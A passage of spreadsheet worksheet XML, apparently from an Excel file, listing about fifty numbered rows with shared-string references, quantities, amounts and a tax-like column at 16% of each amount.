      <c r="J1942" s="15">
        <v>33.6</v>
      </c>
      <c r="K1942" s="16"/>
    </row>
    <row r="1943" spans="2:11">
      <c r="B1943" s="9">
        <v>1977</v>
      </c>
      <c r="C1943" s="238" t="s">
        <v>10043</v>
      </c>
      <c r="D1943" s="238" t="s">
        <v>10044</v>
      </c>
      <c r="E1943" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1943" s="238" t="s">
        <v>10045</v>
      </c>
      <c r="G1943" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1943" s="10">
        <v>1</v>
      </c>
      <c r="I1943" s="14">
        <v>130</v>
      </c>
      <c r="J1943" s="15">
        <v>20.8</v>
      </c>
      <c r="K1943" s="16"/>
    </row>
    <row r="1944" spans="2:11">
      <c r="B1944" s="9">
        <v>1978</v>
      </c>
      <c r="C1944" s="238" t="s">
        <v>10046</v>
      </c>
      <c r="D1944" s="238" t="s">
        <v>10047</v>
      </c>
      <c r="E1944" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1944" s="238" t="s">
        <v>10048</v>
      </c>
      <c r="G1944" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1944" s="10">
        <v>1</v>
      </c>
      <c r="I1944" s="14">
        <v>213.37</v>
      </c>
      <c r="J1944" s="15">
        <v>34.1392</v>
      </c>
      <c r="K1944" s="16"/>
    </row>
    <row r="1945" spans="2:11">
      <c r="B1945" s="9">
        <v>1979</v>
      </c>
      <c r="C1945" s="238" t="s">
        <v>10049</v>
      </c>
      <c r="D1945" s="238" t="s">
        <v>10050</v>
      </c>
      <c r="E1945" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1945" s="238" t="s">
        <v>10051</v>
      </c>
      <c r="G1945" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1945" s="10">
        <v>2</v>
      </c>
      <c r="I1945" s="14">
        <v>351</v>
      </c>
      <c r="J1945" s="15">
        <v>56.16</v>
      </c>
      <c r="K1945" s="16"/>
    </row>
    <row r="1946" spans="2:11">
      <c r="B1946" s="9">
        <v>1980</v>
      </c>
      <c r="C1946" s="238" t="s">
        <v>10052</v>
      </c>
      <c r="D1946" s="238" t="s">
        <v>10053</v>
      </c>
      <c r="E1946" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1946" s="238" t="s">
        <v>10054</v>
      </c>
      <c r="G1946" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1946" s="10">
        <v>1</v>
      </c>
      <c r="I1946" s="14">
        <v>289.23</v>
      </c>
      <c r="J1946" s="15">
        <v>46.2768</v>
      </c>
      <c r="K1946" s="16"/>
    </row>
    <row r="1947" spans="2:11">
      <c r="B1947" s="9">
        <v>1981</v>
      </c>
      <c r="C1947" s="238" t="s">
        <v>10055</v>
      </c>
      <c r="D1947" s="238" t="s">
        <v>10056</v>
      </c>
      <c r="E1947" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1947" s="238" t="s">
        <v>10057</v>
      </c>
      <c r="G1947" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1947" s="10">
        <v>6</v>
      </c>
      <c r="I1947" s="14">
        <v>1102.56</v>
      </c>
      <c r="J1947" s="15">
        <v>176.4096</v>
      </c>
      <c r="K1947" s="16"/>
    </row>
    <row r="1948" spans="2:11">
      <c r="B1948" s="9">
        <v>1982</v>
      </c>
      <c r="C1948" s="238" t="s">
        <v>10058</v>
      </c>
      <c r="D1948" s="238" t="s">
        <v>10059</v>
      </c>
      <c r="E1948" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1948" s="238" t="s">
        <v>10060</v>
      </c>
      <c r="G1948" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1948" s="10">
        <v>1</v>
      </c>
      <c r="I1948" s="14">
        <v>300</v>
      </c>
      <c r="J1948" s="15">
        <v>48</v>
      </c>
      <c r="K1948" s="16"/>
    </row>
    <row r="1949" spans="2:11">
      <c r="B1949" s="9">
        <v>1983</v>
      </c>
      <c r="C1949" s="238" t="s">
        <v>10061</v>
      </c>
      <c r="D1949" s="238" t="s">
        <v>10062</v>
      </c>
      <c r="E1949" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1949" s="238" t="s">
        <v>10063</v>
      </c>
      <c r="G1949" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1949" s="10">
        <v>2</v>
      </c>
      <c r="I1949" s="14">
        <v>460</v>
      </c>
      <c r="J1949" s="15">
        <v>73.6</v>
      </c>
      <c r="K1949" s="16"/>
    </row>
    <row r="1950" spans="2:11">
      <c r="B1950" s="9">
        <v>1984</v>
      </c>
      <c r="C1950" s="238" t="s">
        <v>10064</v>
      </c>
      <c r="D1950" s="238" t="s">
        <v>10065</v>
      </c>
      <c r="E1950" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1950" s="238" t="s">
        <v>10066</v>
      </c>
      <c r="G1950" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1950" s="10">
        <v>6</v>
      </c>
      <c r="I1950" s="14">
        <v>1487.18</v>
      </c>
      <c r="J1950" s="15">
        <v>237.9456</v>
      </c>
      <c r="K1950" s="16"/>
    </row>
    <row r="1951" spans="2:11">
      <c r="B1951" s="9">
        <v>1985</v>
      </c>
      <c r="C1951" s="238" t="s">
        <v>10067</v>
      </c>
      <c r="D1951" s="238" t="s">
        <v>10068</v>
      </c>
      <c r="E1951" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1951" s="238" t="s">
        <v>10069</v>
      </c>
      <c r="G1951" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1951" s="10">
        <v>2</v>
      </c>
      <c r="I1951" s="14">
        <v>495.73</v>
      </c>
      <c r="J1951" s="15">
        <v>79.3184</v>
      </c>
      <c r="K1951" s="16"/>
    </row>
    <row r="1952" spans="2:11">
      <c r="B1952" s="9">
        <v>1986</v>
      </c>
      <c r="C1952" s="238" t="s">
        <v>10070</v>
      </c>
      <c r="D1952" s="238" t="s">
        <v>10071</v>
      </c>
      <c r="E1952" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1952" s="238" t="s">
        <v>10072</v>
      </c>
      <c r="G1952" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1952" s="10">
        <v>2</v>
      </c>
      <c r="I1952" s="14">
        <v>511</v>
      </c>
      <c r="J1952" s="15">
        <v>81.76</v>
      </c>
      <c r="K1952" s="16"/>
    </row>
    <row r="1953" spans="2:11">
      <c r="B1953" s="9">
        <v>1987</v>
      </c>
      <c r="C1953" s="238" t="s">
        <v>10073</v>
      </c>
      <c r="D1953" s="238" t="s">
        <v>10074</v>
      </c>
      <c r="E1953" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1953" s="238" t="s">
        <v>10075</v>
      </c>
      <c r="G1953" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1953" s="10">
        <v>5</v>
      </c>
      <c r="I1953" s="14">
        <v>539.4</v>
      </c>
      <c r="J1953" s="15">
        <v>86.304</v>
      </c>
      <c r="K1953" s="16"/>
    </row>
    <row r="1954" spans="2:11">
      <c r="B1954" s="9">
        <v>1988</v>
      </c>
      <c r="C1954" s="238" t="s">
        <v>10076</v>
      </c>
      <c r="D1954" s="238" t="s">
        <v>10077</v>
      </c>
      <c r="E1954" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1954" s="238" t="s">
        <v>10078</v>
      </c>
      <c r="G1954" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1954" s="10">
        <v>2</v>
      </c>
      <c r="I1954" s="14">
        <v>210</v>
      </c>
      <c r="J1954" s="15">
        <v>33.6</v>
      </c>
      <c r="K1954" s="16"/>
    </row>
    <row r="1955" spans="2:11">
      <c r="B1955" s="9">
        <v>1989</v>
      </c>
      <c r="C1955" s="238" t="s">
        <v>10079</v>
      </c>
      <c r="D1955" s="238" t="s">
        <v>10080</v>
      </c>
      <c r="E1955" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1955" s="238" t="s">
        <v>10081</v>
      </c>
      <c r="G1955" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1955" s="10">
        <v>8</v>
      </c>
      <c r="I1955" s="14">
        <v>404.79</v>
      </c>
      <c r="J1955" s="15">
        <v>64.768</v>
      </c>
      <c r="K1955" s="16"/>
    </row>
    <row r="1956" spans="2:11">
      <c r="B1956" s="9">
        <v>1990</v>
      </c>
      <c r="C1956" s="238" t="s">
        <v>10082</v>
      </c>
      <c r="D1956" s="238" t="s">
        <v>10083</v>
      </c>
      <c r="E1956" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1956" s="238" t="s">
        <v>10084</v>
      </c>
      <c r="G1956" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1956" s="10">
        <v>11</v>
      </c>
      <c r="I1956" s="14">
        <v>545.3</v>
      </c>
      <c r="J1956" s="15">
        <v>87.2432</v>
      </c>
      <c r="K1956" s="16"/>
    </row>
    <row r="1957" spans="2:11">
      <c r="B1957" s="9">
        <v>1991</v>
      </c>
      <c r="C1957" s="238" t="s">
        <v>10085</v>
      </c>
      <c r="D1957" s="238" t="s">
        <v>10086</v>
      </c>
      <c r="E1957" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1957" s="238" t="s">
        <v>10087</v>
      </c>
      <c r="G1957" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1957" s="10">
        <v>1</v>
      </c>
      <c r="I1957" s="14">
        <v>324.79</v>
      </c>
      <c r="J1957" s="15">
        <v>51.9664</v>
      </c>
      <c r="K1957" s="16"/>
    </row>
    <row r="1958" spans="2:11">
      <c r="B1958" s="9">
        <v>1992</v>
      </c>
      <c r="C1958" s="238" t="s">
        <v>10088</v>
      </c>
      <c r="D1958" s="238" t="s">
        <v>10089</v>
      </c>
      <c r="E1958" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1958" s="238" t="s">
        <v>10090</v>
      </c>
      <c r="G1958" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1958" s="10">
        <v>5</v>
      </c>
      <c r="I1958" s="14">
        <v>510</v>
      </c>
      <c r="J1958" s="15">
        <v>81.6</v>
      </c>
      <c r="K1958" s="16"/>
    </row>
    <row r="1959" spans="2:11">
      <c r="B1959" s="9">
        <v>1993</v>
      </c>
      <c r="C1959" s="238" t="s">
        <v>10091</v>
      </c>
      <c r="D1959" s="238" t="s">
        <v>10092</v>
      </c>
      <c r="E1959" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1959" s="238" t="s">
        <v>10093</v>
      </c>
      <c r="G1959" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1959" s="10">
        <v>5</v>
      </c>
      <c r="I1959" s="14">
        <v>2369.62</v>
      </c>
      <c r="J1959" s="15">
        <v>379.136</v>
      </c>
      <c r="K1959" s="16"/>
    </row>
    <row r="1960" spans="2:11">
      <c r="B1960" s="9">
        <v>1994</v>
      </c>
      <c r="C1960" s="238" t="s">
        <v>10094</v>
      </c>
      <c r="D1960" s="238" t="s">
        <v>10095</v>
      </c>
      <c r="E1960" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1960" s="238" t="s">
        <v>10096</v>
      </c>
      <c r="G1960" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1960" s="10">
        <v>1</v>
      </c>
      <c r="I1960" s="14">
        <v>333.34</v>
      </c>
      <c r="J1960" s="15">
        <v>53.3344</v>
      </c>
      <c r="K1960" s="16"/>
    </row>
    <row r="1961" spans="2:11">
      <c r="B1961" s="9">
        <v>1995</v>
      </c>
      <c r="C1961" s="238" t="s">
        <v>10097</v>
      </c>
      <c r="D1961" s="238" t="s">
        <v>10065</v>
      </c>
      <c r="E1961" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1961" s="238" t="s">
        <v>10098</v>
      </c>
      <c r="G1961" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1961" s="10">
        <v>1</v>
      </c>
      <c r="I1961" s="14">
        <v>521.5</v>
      </c>
      <c r="J1961" s="15">
        <v>83.44</v>
      </c>
      <c r="K1961" s="16"/>
    </row>
    <row r="1962" spans="2:11">
      <c r="B1962" s="9">
        <v>1996</v>
      </c>
      <c r="C1962" s="238" t="s">
        <v>10099</v>
      </c>
      <c r="D1962" s="238" t="s">
        <v>10100</v>
      </c>
      <c r="E1962" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1962" s="238" t="s">
        <v>10101</v>
      </c>
      <c r="G1962" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1962" s="10">
        <v>1</v>
      </c>
      <c r="I1962" s="14">
        <v>720</v>
      </c>
      <c r="J1962" s="15">
        <v>115.2</v>
      </c>
      <c r="K1962" s="16"/>
    </row>
    <row r="1963" spans="2:11">
      <c r="B1963" s="9">
        <v>1997</v>
      </c>
      <c r="C1963" s="238" t="s">
        <v>10102</v>
      </c>
      <c r="D1963" s="238" t="s">
        <v>10103</v>
      </c>
      <c r="E1963" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1963" s="238" t="s">
        <v>10104</v>
      </c>
      <c r="G1963" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1963" s="10">
        <v>2</v>
      </c>
      <c r="I1963" s="14">
        <v>1054.7</v>
      </c>
      <c r="J1963" s="15">
        <v>168.752</v>
      </c>
      <c r="K1963" s="16"/>
    </row>
    <row r="1964" spans="2:11">
      <c r="B1964" s="9">
        <v>1998</v>
      </c>
      <c r="C1964" s="238" t="s">
        <v>10105</v>
      </c>
      <c r="D1964" s="238" t="s">
        <v>10106</v>
      </c>
      <c r="E1964" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1964" s="238" t="s">
        <v>10107</v>
      </c>
      <c r="G1964" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1964" s="10">
        <v>1</v>
      </c>
      <c r="I1964" s="14">
        <v>767</v>
      </c>
      <c r="J1964" s="15">
        <v>122.72</v>
      </c>
      <c r="K1964" s="16"/>
    </row>
    <row r="1965" spans="2:11">
      <c r="B1965" s="9">
        <v>1999</v>
      </c>
      <c r="C1965" s="238" t="s">
        <v>10108</v>
      </c>
      <c r="D1965" s="238" t="s">
        <v>10109</v>
      </c>
      <c r="E1965" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1965" s="238" t="s">
        <v>10110</v>
      </c>
      <c r="G1965" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1965" s="10">
        <v>2</v>
      </c>
      <c r="I1965" s="14">
        <v>735.04</v>
      </c>
      <c r="J1965" s="15">
        <v>117.6064</v>
      </c>
      <c r="K1965" s="16"/>
    </row>
    <row r="1966" spans="2:11">
      <c r="B1966" s="9">
        <v>2000</v>
      </c>
      <c r="C1966" s="238" t="s">
        <v>10111</v>
      </c>
      <c r="D1966" s="238" t="s">
        <v>10112</v>
      </c>
      <c r="E1966" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1966" s="238" t="s">
        <v>10113</v>
      </c>
      <c r="G1966" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1966" s="10">
        <v>5</v>
      </c>
      <c r="I1966" s="14">
        <v>2180</v>
      </c>
      <c r="J1966" s="15">
        <v>348.8</v>
      </c>
      <c r="K1966" s="16"/>
    </row>
    <row r="1967" spans="2:11">
      <c r="B1967" s="9">
        <v>2001</v>
      </c>
      <c r="C1967" s="238" t="s">
        <v>10114</v>
      </c>
      <c r="D1967" s="238" t="s">
        <v>10115</v>
      </c>
      <c r="E1967" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1967" s="238" t="s">
        <v>10116</v>
      </c>
      <c r="G1967" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1967" s="10">
        <v>2</v>
      </c>
      <c r="I1967" s="14">
        <v>405.12</v>
      </c>
      <c r="J1967" s="15">
        <v>64.8192</v>
      </c>
      <c r="K1967" s="16"/>
    </row>
    <row r="1968" spans="2:11">
      <c r="B1968" s="9">
        <v>2002</v>
      </c>
      <c r="C1968" s="238" t="s">
        <v>10117</v>
      </c>
      <c r="D1968" s="238" t="s">
        <v>10118</v>
      </c>
      <c r="E1968" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1968" s="238" t="s">
        <v>10119</v>
      </c>
      <c r="G1968" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1968" s="10">
        <v>4</v>
      </c>
      <c r="I1968" s="14">
        <v>1100</v>
      </c>
      <c r="J1968" s="15">
        <v>176</v>
      </c>
      <c r="K1968" s="16"/>
    </row>
    <row r="1969" spans="2:11">
      <c r="B1969" s="9">
        <v>2003</v>
      </c>
      <c r="C1969" s="238" t="s">
        <v>10120</v>
      </c>
      <c r="D1969" s="238" t="s">
        <v>10121</v>
      </c>
      <c r="E1969" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1969" s="238" t="s">
        <v>10122</v>
      </c>
      <c r="G1969" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1969" s="10">
        <v>7</v>
      </c>
      <c r="I1969" s="14">
        <v>1196.76</v>
      </c>
      <c r="J1969" s="15">
        <v>191.4864</v>
      </c>
      <c r="K1969" s="16"/>
    </row>
    <row r="1970" spans="2:11">
      <c r="B1970" s="9">
        <v>2004</v>
      </c>
      <c r="C1970" s="238" t="s">
        <v>10123</v>
      </c>
      <c r="D1970" s="238" t="s">
        <v>10124</v>
      </c>
      <c r="E1970" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F1970" s="238" t="s">
        <v>10122</v>
      </c>
      <c r="G1970" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1970" s="10">
        <v>2</v>
      </c>
      <c r="I1970" s="14">
        <v>666.68</v>
      </c>
      <c r="J1970" s="15">
        <v>106.6688</v>
      </c>
      <c r="K1970" s="16"/>
    </row>
    <row r="1971" spans="2:11">
      <c r="B1971" s="9">
        <v>2005</v>
      </c>
      <c r="C1971" s="238" t="s">
        <v>10126</v>
      </c>
      <c r="D1971" s="238" t="s">
        <v>10127</v>
      </c>
      <c r="E1971" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1971" s="238" t="s">
        <v>10128</v>
      </c>
      <c r="G1971" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1971" s="10">
        <v>1</v>
      </c>
      <c r="I1971" s="14">
        <v>180</v>
      </c>
      <c r="J1971" s="15">
        <v>28.8</v>
      </c>
      <c r="K1971" s="16"/>
    </row>
    <row r="1972" spans="2:11">
      <c r="B1972" s="9">
        <v>2006</v>
      </c>
      <c r="C1972" s="238" t="s">
        <v>10129</v>
      </c>
      <c r="D1972" s="238" t="s">
        <v>10130</v>
      </c>
      <c r="E1972" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1972" s="238" t="s">
        <v>10131</v>
      </c>
      <c r="G1972" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1972" s="10">
        <v>1</v>
      </c>
      <c r="I1972" s="14">
        <v>405</v>
      </c>
      <c r="J1972" s="15">
        <v>64.8</v>
      </c>
      <c r="K1972" s="16"/>
    </row>
    <row r="1973" spans="2:11">
      <c r="B1973" s="9">
        <v>2007</v>
      </c>
      <c r="C1973" s="238" t="s">
        <v>10132</v>
      </c>
      <c r="D1973" s="238" t="s">
        <v>10133</v>
      </c>
      <c r="E1973" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1973" s="238" t="s">
        <v>10134</v>
      </c>
      <c r="G1973" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1973" s="10">
        <v>8</v>
      </c>
      <c r="I1973" s="14">
        <v>1000</v>
      </c>
      <c r="J1973" s="15">
        <v>160</v>
      </c>
      <c r="K1973" s="16"/>
    </row>
    <row r="1974" spans="2:11">
      <c r="B1974" s="9">
        <v>2008</v>
      </c>
      <c r="C1974" s="238" t="s">
        <v>10135</v>
      </c>
      <c r="D1974" s="238" t="s">
        <v>10136</v>
      </c>
      <c r="E1974" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1974" s="238" t="s">
        <v>10137</v>
      </c>
      <c r="G1974" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1974" s="10">
        <v>2</v>
      </c>
      <c r="I1974" s="14">
        <v>500</v>
      </c>
      <c r="J1974" s="15">
        <v>80</v>
      </c>
      <c r="K1974" s="16"/>
    </row>
    <row r="1975" spans="2:11">
      <c r="B1975" s="9">
        <v>2009</v>
      </c>
      <c r="C1975" s="238" t="s">
        <v>10138</v>
      </c>
      <c r="D1975" s="238" t="s">
        <v>10139</v>
      </c>
      <c r="E1975" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1975" s="238" t="s">
        <v>10140</v>
      </c>
      <c r="G1975" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1975" s="10">
        <v>1</v>
      </c>
      <c r="I1975" s="14">
        <v>500</v>
      </c>
      <c r="J1975" s="15">
        <v>80</v>
      </c>
      <c r="K1975" s="16"/>
    </row>
    <row r="1976" spans="2:11">
      <c r="B1976" s="9">
        <v>2010</v>
      </c>
      <c r="C1976" s="238" t="s">
        <v>10141</v>
      </c>
      <c r="D1976" s="238" t="s">
        <v>10142</v>
      </c>
      <c r="E1976" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1976" s="238" t="s">
        <v>10143</v>
      </c>
      <c r="G1976" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1976" s="10">
        <v>1</v>
      </c>
      <c r="I1976" s="14">
        <v>1000</v>
      </c>
      <c r="J1976" s="15">
        <v>160</v>
      </c>
      <c r="K1976" s="16"/>
    </row>
    <row r="1977" spans="2:11">
      <c r="B1977" s="9">
        <v>2011</v>
      </c>
      <c r="C1977" s="238" t="s">
        <v>10144</v>
      </c>
      <c r="D1977" s="238" t="s">
        <v>10145</v>
      </c>
      <c r="E1977" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1977" s="238" t="s">
        <v>10146</v>
      </c>
      <c r="G1977" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1977" s="10">
        <v>3</v>
      </c>
      <c r="I1977" s="14">
        <v>1099.36</v>
      </c>
      <c r="J1977" s="15">
        <v>175.896</v>
      </c>
      <c r="K1977" s="16"/>
    </row>
    <row r="1978" spans="2:11">
      <c r="B1978" s="9">
        <v>2012</v>
      </c>
      <c r="C1978" s="238" t="s">
        <v>10147</v>
      </c>
      <c r="D1978" s="238" t="s">
        <v>10148</v>
      </c>
      <c r="E1978" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F1978" s="238" t="s">
        <v>10146</v>
      </c>
      <c r="G1978" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1978" s="10">
        <v>2</v>
      </c>
      <c r="I1978" s="14">
        <v>1965.81</v>
      </c>
      <c r="J1978" s="15">
        <v>314.5312</v>
      </c>
      <c r="K1978" s="16"/>
    </row>
    <row r="1979" spans="2:11">
      <c r="B1979" s="9">
        <v>2013</v>
      </c>
      <c r="C1979" s="238" t="s">
        <v>10149</v>
      </c>
      <c r="D1979" s="238" t="s">
        <v>10150</v>
      </c>
      <c r="E1979" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1979" s="238" t="s">
        <v>10151</v>
      </c>
      <c r="G1979" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1979" s="10">
        <v>5</v>
      </c>
      <c r="I1979" s="14">
        <v>1520</v>
      </c>
      <c r="J1979" s="15">
        <v>243.2</v>
      </c>
      <c r="K1979" s="16"/>
    </row>
    <row r="1980" spans="2:11">
      <c r="B1980" s="9">
        <v>2014</v>
      </c>
      <c r="C1980" s="238" t="s">
        <v>10152</v>
      </c>
      <c r="D1980" s="238" t="s">
        <v>10153</v>
      </c>
      <c r="E1980" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F1980" s="238" t="s">
        <v>10154</v>
      </c>
      <c r="G1980" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1980" s="10">
        <v>2</v>
      </c>
      <c r="I1980" s="14">
        <v>1641.03</v>
      </c>
      <c r="J1980" s="15">
        <v>262.5664</v>
      </c>
      <c r="K1980" s="16"/>
    </row>
    <row r="1981" spans="2:11">
      <c r="B1981" s="9">
        <v>2015</v>
      </c>
      <c r="C1981" s="238" t="s">
        <v>10155</v>
      </c>
      <c r="D1981" s="238" t="s">
        <v>10156</v>
      </c>
      <c r="E1981" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1981" s="238" t="s">
        <v>10157</v>
      </c>
      <c r="G1981" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1981" s="10">
        <v>4</v>
      </c>
      <c r="I1981" s="14">
        <v>500</v>
      </c>
      <c r="J1981" s="15">
        <v>80</v>
      </c>
      <c r="K1981" s="16"/>
    </row>
    <row r="1982" spans="2:11">
      <c r="B1982" s="9">
        <v>2016</v>
      </c>
      <c r="C1982" s="238" t="s">
        <v>10158</v>
      </c>
      <c r="D1982" s="238" t="s">
        <v>10159</v>
      </c>
      <c r="E1982" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1982" s="238" t="s">
        <v>10160</v>
      </c>
      <c r="G1982" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1982" s="10">
        <v>2</v>
      </c>
      <c r="I1982" s="14">
        <v>500</v>
      </c>
      <c r="J1982" s="15">
        <v>80</v>
      </c>
      <c r="K1982" s="16"/>
    </row>
    <row r="1983" spans="2:11">
      <c r="B1983" s="9">
        <v>2017</v>
      </c>
      <c r="C1983" s="238" t="s">
        <v>10161</v>
      </c>
      <c r="D1983" s="238" t="s">
        <v>10162</v>
      </c>
      <c r="E1983" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1983" s="238" t="s">
        <v>10163</v>
      </c>
      <c r="G1983" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1983" s="10">
        <v>4</v>
      </c>
      <c r="I1983" s="14">
        <v>2800</v>
      </c>
      <c r="J1983" s="15">
        <v>448</v>
      </c>
      <c r="K1983" s="16"/>
    </row>
    <row r="1984" spans="2:11">
      <c r="B1984" s="9">
        <v>2018</v>
      </c>
      <c r="C1984" s="238" t="s">
        <v>10164</v>
      </c>
      <c r="D1984" s="238" t="s">
        <v>10165</v>
      </c>
      <c r="E1984" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F1984" s="238" t="s">
        <v>10166</v>
      </c>
      <c r="G1984" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1984" s="10">
        <v>2</v>
      </c>
      <c r="I1984" s="14">
        <v>2991.45</v>
      </c>
      <c r="J1984" s="15">
        <v>478.6336</v>
      </c>
      <c r="K1984" s="16"/>
    </row>
    <row r="1985" spans="2:11">
      <c r="B1985" s="9">
        <v>2019</v>
      </c>
      <c r="C1985" s="238" t="s">
        <v>10167</v>
      </c>
      <c r="D1985" s="238" t="s">
        <v>10168</v>
      </c>
      <c r="E1985" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1985" s="238" t="s">
        <v>10169</v>
      </c>
      <c r="G1985" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1985" s="10">
        <v>3</v>
      </c>
      <c r="I1985" s="14">
        <v>2400</v>
      </c>
      <c r="J1985" s="15">
        <v>384</v>
      </c>
      <c r="K1985" s="16"/>
    </row>
    <row r="1986" spans="2:11">
      <c r="B1986" s="9">
        <v>2020</v>
      </c>
      <c r="C1986" s="238" t="s">
        <v>10170</v>
      </c>
      <c r="D1986" s="238" t="s">
        <v>10171</v>
      </c>
      <c r="E1986" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1986" s="238" t="s">
        <v>10172</v>
      </c>
      <c r="G1986" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1986" s="10">
        <v>3</v>
      </c>
      <c r="I1986" s="14">
        <v>4000</v>
      </c>
      <c r="J1986" s="15">
        <v>639.9984</v>
      </c>
      <c r="K1986" s="16"/>
    </row>
    <row r="1987" spans="2:11">
      <c r="B1987" s="9">
        <v>2021</v>
      </c>
      <c r="C1987" s="238" t="s">
        <v>10173</v>
      </c>
      <c r="D1987" s="238" t="s">
        <v>10174</v>
      </c>
      <c r="E1987" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1987" s="238" t="s">
        <v>10175</v>
      </c>
      <c r="G1987" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1987" s="10">
        <v>1</v>
      </c>
      <c r="I1987" s="14">
        <v>900</v>
      </c>
      <c r="J1987" s="15">
        <v>144</v>
      </c>
      <c r="K1987" s="16"/>
    </row>
    <row r="1988" spans="2:11">
      <c r="B1988" s="9">
        <v>2022</v>
      </c>
      <c r="C1988" s="238" t="s">
        <v>10176</v>
      </c>
      <c r="D1988" s="238" t="s">
        <v>10177</v>
      </c>
      <c r="E1988" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1988" s="238" t="s">
        <v>10178</v>
      </c>
      <c r="G1988" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1988" s="10">
        <v>2</v>
      </c>
      <c r="I1988" s="14">
        <v>821.08</v>
      </c>
      <c r="J1988" s="15">
        <v>131.3728</v>
      </c>
      <c r="K1988" s="16"/>
    </row>
    <row r="1989" spans="2:11">
      <c r="B1989" s="9">
        <v>2023</v>
      </c>
      <c r="C1989" s="238" t="s">
        <v>10179</v>
      </c>
      <c r="D1989" s="238" t="s">
        <v>10180</v>
      </c>
      <c r="E1989" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1989" s="238" t="s">
        <v>10181</v>
      </c>
      <c r="G1989" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1989" s="10">
        <v>2</v>
      </c>
      <c r="I1989" s="14">
        <v>150.43</v>
      </c>
      <c r="J1989" s="15">
        <v>24.0704</v>
      </c>
      <c r="K1989" s="16"/>
    </row>
    <row r="1990" spans="2:11">
      <c r="B1990" s="9">
